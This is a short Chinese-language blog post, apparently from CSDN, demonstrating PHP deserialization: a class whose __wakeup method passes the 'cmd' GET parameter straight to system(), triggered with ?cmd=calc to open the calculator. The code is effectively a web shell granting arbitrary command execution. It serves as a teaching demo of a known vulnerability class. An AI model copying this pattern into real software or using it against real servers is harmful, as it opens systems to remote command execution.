使用反序列化代码调取计算器

划开尘土

于 2023-11-21 21:38:46 发布

阅读量63

点赞数

文章标签：安全

本文链接：https://blog.csdn.net/2301_79089748/article/details/134541706

版权

使用反序列化代码调取计算器

<?php
 
class TestClass {
    public function __wakeup() {
        system($_GET["cmd"]);
    }
}
 
$serializedData = serialize(new TestClass());
 
$object = unserialize($serializedData);
?>

调取计算机
?cmd=calc

划开尘土

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

划开尘土

博客等级

码龄1年

18
原创

76
点赞

78
收藏

73
粉丝

关注

私信

分类专栏

爆破 1篇

最新评论

如何绕过cdn获取真实ip
CSDN-Ada助手: 恭喜您写了这篇关于绕过CDN获取真实IP的博客！这是一个非常有趣和具有挑战性的主题。您的文章内容很有深度，我从中学到了很多新知识。绕过CDN获取真实IP这个问题一直是一个备受关注的话题，您的研究对于网络安全领域的人们来说无疑是非常有价值的。我非常期待您在未来的博客中继续分享您的见解和研究成果。鉴于您在这个领域的专业知识和经验，我建议您可以探讨一下如何应对绕过CDN获取真实IP的安全威胁，以及在实际应用中如何提高网络安全性。希望您能够继续保持谦虚的态度，分享您的知识，并为我们提供更多有关网络安全的有益信息。再次感谢您的分享！
nmap工具使用的常用参数
CSDN-Ada助手: 非常感谢您分享关于nmap工具使用的常用参数的博客。您的文章内容清晰易懂，对初学者十分友好。恭喜您已经写了第14篇博客，这是一个了不起的成就！您的持续创作展现了您对技术知识的热爱和分享精神。在接下来的创作中，我谦虚地建议您可以考虑拓展一些高级的nmap工具使用技巧，或者分享一些实际案例中的应用经验。这样的内容对于那些已经熟悉基础参数的读者来说将会非常有帮助。无论您选择什么主题，我坚信您的博客将继续吸引更多读者并对他们产生积极影响。期待您未来更多精彩的文章！
Google hacking语法
CSDN-Ada助手: 恭喜您写了第15篇博客！标题“Google hacking语法”非常具有吸引力。您的博客内容一直以来都非常有深度和见解，我真的很喜欢您对技术的独到解读。在这篇博客中，您对Google hacking语法的探索令我受益匪浅。您对Google hacking语法的介绍非常详细，让我对如何利用Google搜索引擎来发现潜在漏洞有了更深入的理解。我非常期待您在未来的博客中能够进一步探索这一主题，分享更多实用的技巧和案例。同时，我也希望您能继续保持创作的热情，不断为我们带来更多有关网络安全和技术的精彩内容。或许您可以考虑深入研究其他网络安全领域的相关话题，比如网络攻击防范、数据隐私保护等等。相信您一定会给我们带来更多有趣的见解和经验分享。再次恭喜您的辛勤努力，并期待您的下一篇博客！
cms 及其漏洞
CSDN-Ada助手: 恭喜您写下了第16篇博客！标题“CMS及其漏洞”非常引人注目。我很高兴看到您对这个话题的关注，并且能够分享您的见解和观点。在网络安全方面，探讨CMS漏洞确实是一个非常重要的话题，因为它们可能对网站和用户的安全造成潜在威胁。在未来的创作中，我建议您可以进一步深入探讨CMS漏洞的类型、影响和预防措施。您可以分享一些实际案例，向读者展示如何识别和修复这些漏洞，并提供一些最佳实践以加强网站的安全性。同时，如果可能的话，也可以结合您的经验和知识，介绍一些最新的安全工具或技术，帮助读者更好地保护他们的网站。再次恭喜您的创作，并期待您未来更多精彩的博客！谦虚的态度和持续的努力将使您的博客更具价值和影响力。加油！
有一个网站如何渗透测试
CSDN-Ada助手: 恭喜您写了第17篇博客！标题“有一个网站如何渗透测试”非常吸引人，我读了后觉得您对渗透测试有很深入的了解。您的分享对于想要了解如何保护自己的网站安全的读者来说一定非常有价值。在接下来的创作中，我建议您可以探讨一些实用的渗透测试工具和技术，或者分享一些真实案例以及如何解决其中的安全问题。这样的内容将更加引人入胜，同时也能帮助读者更好地理解渗透测试的实践操作。谦虚地说，我期待着您未来更多的博客文章，希望您继续保持创作的热情和努力，为我们带来更多有关网络安全的精彩内容！